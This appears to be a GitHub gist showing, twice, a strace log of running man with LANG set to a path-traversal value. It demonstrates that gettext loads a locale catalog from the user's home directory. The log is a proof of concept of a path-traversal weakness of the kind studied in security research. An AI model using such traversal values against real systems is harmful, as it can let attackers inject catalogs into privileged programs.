ss23/gist:2732297

## gistfile1.txt
ss23@Crisp ~/gettext-exploit $ LANG=en/../../../../home/ss23/ strace man | grep open
execve("/usr/bin/man", ["man"], [/* 31 vars */]) = 0
brk(0)                                  = 0x76f201dbf0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x25e201c5000
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=42387, ...}) = 0
mmap(NULL, 42387, PROT_READ, MAP_PRIVATE, 3, 0) = 0x25e201ba000
close(3)                                = 0
open("/lib64/libc.so.6", O_RDONLY)      = 3
read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\200#\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=1616968, ...}) = 0
mmap(NULL, 3727112, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x25e1fc19000
mprotect(0x25e1fd9e000, 2093056, PROT_NONE) = 0
mmap(0x25e1ff9d000, 20480, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x184000) = 0x25e1ff9d000
mmap(0x25e1ffa2000, 20232, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x25e1ffa2000
close(3)                                = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x25e201b9000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x25e201b8000
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x25e201b7000
arch_prctl(ARCH_SET_FS, 0x25e201b8700)  = 0
mprotect(0x25e1ff9d000, 16384, PROT_READ) = 0
mprotect(0x76f200e000, 4096, PROT_READ) = 0
mprotect(0x25e201c7000, 4096, PROT_READ) = 0
munmap(0x25e201ba000, 42387)            = 0
brk(0)                                  = 0x76f201dbf0
brk(0x76f203ebf0)                       = 0x76f203ebf0
brk(0x76f203f000)                       = 0x76f203f000
open("/usr/lib64/locale/locale-archive", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=1863152, ...}) = 0
mmap(NULL, 1863152, PROT_READ, MAP_PRIVATE, 3, 0) = 0x25e1fff0000
close(3)                                = 0
open("/usr/share/locale/locale.alias", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=2585, ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x25e201c4000
read(3, "# Locale name alias data base.\n#"..., 4096) = 2585
read(3, "", 4096)                       = 0
close(3)                                = 0
munmap(0x25e201c4000, 4096)             = 0
open("/usr/lib64/locale/en/../../../../home/ss23//LC_CTYPE", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/lib64/locale/en/.homess23/LC_CTYPE", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/lib64/locale/en//LC_CTYPE", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/lib64/locale/en/../../../../home/ss23//LC_MESSAGES", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/lib64/locale/en/.homess23/LC_MESSAGES", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/lib64/locale/en//LC_MESSAGES", O_RDONLY) = -1 ENOENT (No such file or directory)
getuid()                                = 1000
geteuid()                               = 1000
getgid()                                = 1000
getegid()                               = 1000
ioctl(0, SNDCTL_TMR_TIMEBASE or SNDRV_TIMER_IOCTL_NEXT_DEVICE or TCGETS, {B38400 opost isig icanon echo ...}) = 0
ioctl(1, SNDCTL_TMR_TIMEBASE or SNDRV_TIMER_IOCTL_NEXT_DEVICE or TCGETS, 0x38c793cd4f0) = -1 EINVAL (Invalid argument)
open("/etc/man.conf", O_RDONLY)         = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=4630, ...}) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x25e201c4000
read(3, "#\n# Generated automatically from"..., 4096) = 4096
brk(0x76f2061000)                       = 0x76f2061000
read(3, "\n#\nMANSECT\t\t1:1p:8:2:3:3p:4:5:6:"..., 4096) = 534
read(3, "", 4096)                       = 0
open("/usr/share/locale/C/man", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/C/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/C/man", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/C/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/en/../../../../home/ss23//man", O_RDONLY) = 4
fstat(4, {st_mode=S_IFREG|0644, st_size=5843, ...}) = 0
mmap(NULL, 5843, PROT_READ, MAP_PRIVATE, 4, 0) = 0x25e201c2000
close(4)                                = 0
write(2, "What manual page do you want?\n", 30What manual page do you want?
) = 30
exit_group(1)                           = ?
ss23@Crisp ~/gettext-exploit $
	ss23@Crisp ~/gettext-exploit $ LANG=en/../../../../home/ss23/ strace man \| grep open
	execve("/usr/bin/man", ["man"], [/* 31 vars */]) = 0
	brk(0) = 0x76f201dbf0
	mmap(NULL, 4096, PROT_READ\|PROT_WRITE, MAP_PRIVATE\|MAP_ANONYMOUS, -1, 0) = 0x25e201c5000
	access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
	open("/etc/ld.so.cache", O_RDONLY) = 3
	fstat(3, {st_mode=S_IFREG\|0644, st_size=42387, ...}) = 0
	mmap(NULL, 42387, PROT_READ, MAP_PRIVATE, 3, 0) = 0x25e201ba000
	close(3) = 0
	open("/lib64/libc.so.6", O_RDONLY) = 3
	read(3, "\177ELF\2\1\1\0\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\200#\2\0\0\0\0\0"..., 832) = 832
	fstat(3, {st_mode=S_IFREG\|0755, st_size=1616968, ...}) = 0
	mmap(NULL, 3727112, PROT_READ\|PROT_EXEC, MAP_PRIVATE\|MAP_DENYWRITE, 3, 0) = 0x25e1fc19000
	mprotect(0x25e1fd9e000, 2093056, PROT_NONE) = 0
	mmap(0x25e1ff9d000, 20480, PROT_READ\|PROT_WRITE, MAP_PRIVATE\|MAP_FIXED\|MAP_DENYWRITE, 3, 0x184000) = 0x25e1ff9d000
	mmap(0x25e1ffa2000, 20232, PROT_READ\|PROT_WRITE, MAP_PRIVATE\|MAP_FIXED\|MAP_ANONYMOUS, -1, 0) = 0x25e1ffa2000
	close(3) = 0
	mmap(NULL, 4096, PROT_READ\|PROT_WRITE, MAP_PRIVATE\|MAP_ANONYMOUS, -1, 0) = 0x25e201b9000
	mmap(NULL, 4096, PROT_READ\|PROT_WRITE, MAP_PRIVATE\|MAP_ANONYMOUS, -1, 0) = 0x25e201b8000
	mmap(NULL, 4096, PROT_READ\|PROT_WRITE, MAP_PRIVATE\|MAP_ANONYMOUS, -1, 0) = 0x25e201b7000
	arch_prctl(ARCH_SET_FS, 0x25e201b8700) = 0
	mprotect(0x25e1ff9d000, 16384, PROT_READ) = 0
	mprotect(0x76f200e000, 4096, PROT_READ) = 0
	mprotect(0x25e201c7000, 4096, PROT_READ) = 0
	munmap(0x25e201ba000, 42387) = 0
	brk(0) = 0x76f201dbf0
	brk(0x76f203ebf0) = 0x76f203ebf0
	brk(0x76f203f000) = 0x76f203f000
	open("/usr/lib64/locale/locale-archive", O_RDONLY) = 3
	fstat(3, {st_mode=S_IFREG\|0644, st_size=1863152, ...}) = 0
	mmap(NULL, 1863152, PROT_READ, MAP_PRIVATE, 3, 0) = 0x25e1fff0000
	close(3) = 0
	open("/usr/share/locale/locale.alias", O_RDONLY) = 3
	fstat(3, {st_mode=S_IFREG\|0644, st_size=2585, ...}) = 0
	mmap(NULL, 4096, PROT_READ\|PROT_WRITE, MAP_PRIVATE\|MAP_ANONYMOUS, -1, 0) = 0x25e201c4000
	read(3, "# Locale name alias data base.\n#"..., 4096) = 2585
	read(3, "", 4096) = 0
	close(3) = 0
	munmap(0x25e201c4000, 4096) = 0
	open("/usr/lib64/locale/en/../../../../home/ss23//LC_CTYPE", O_RDONLY) = -1 ENOENT (No such file or directory)
	open("/usr/lib64/locale/en/.homess23/LC_CTYPE", O_RDONLY) = -1 ENOENT (No such file or directory)
	open("/usr/lib64/locale/en//LC_CTYPE", O_RDONLY) = -1 ENOENT (No such file or directory)
	open("/usr/lib64/locale/en/../../../../home/ss23//LC_MESSAGES", O_RDONLY) = -1 ENOENT (No such file or directory)
	open("/usr/lib64/locale/en/.homess23/LC_MESSAGES", O_RDONLY) = -1 ENOENT (No such file or directory)
	open("/usr/lib64/locale/en//LC_MESSAGES", O_RDONLY) = -1 ENOENT (No such file or directory)
	getuid() = 1000
	geteuid() = 1000
	getgid() = 1000
	getegid() = 1000
	ioctl(0, SNDCTL_TMR_TIMEBASE or SNDRV_TIMER_IOCTL_NEXT_DEVICE or TCGETS, {B38400 opost isig icanon echo ...}) = 0
	ioctl(1, SNDCTL_TMR_TIMEBASE or SNDRV_TIMER_IOCTL_NEXT_DEVICE or TCGETS, 0x38c793cd4f0) = -1 EINVAL (Invalid argument)
	open("/etc/man.conf", O_RDONLY) = 3
	fstat(3, {st_mode=S_IFREG\|0644, st_size=4630, ...}) = 0
	mmap(NULL, 4096, PROT_READ\|PROT_WRITE, MAP_PRIVATE\|MAP_ANONYMOUS, -1, 0) = 0x25e201c4000
	read(3, "#\n# Generated automatically from"..., 4096) = 4096
	brk(0x76f2061000) = 0x76f2061000
	read(3, "\n#\nMANSECT\t\t1:1p:8:2:3:3p:4:5:6:"..., 4096) = 534
	read(3, "", 4096) = 0
	open("/usr/share/locale/C/man", O_RDONLY) = -1 ENOENT (No such file or directory)
	open("/usr/share/locale/C/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)
	open("/usr/share/locale/C/man", O_RDONLY) = -1 ENOENT (No such file or directory)
	open("/usr/share/locale/C/LC_MESSAGES/man", O_RDONLY) = -1 ENOENT (No such file or directory)
	open("/usr/share/locale/en/../../../../home/ss23//man", O_RDONLY) = 4
	fstat(4, {st_mode=S_IFREG\|0644, st_size=5843, ...}) = 0
	mmap(NULL, 5843, PROT_READ, MAP_PRIVATE, 4, 0) = 0x25e201c2000
	close(4) = 0
	write(2, "What manual page do you want?\n", 30What manual page do you want?
	) = 30
	exit_group(1) = ?
	ss23@Crisp ~/gettext-exploit $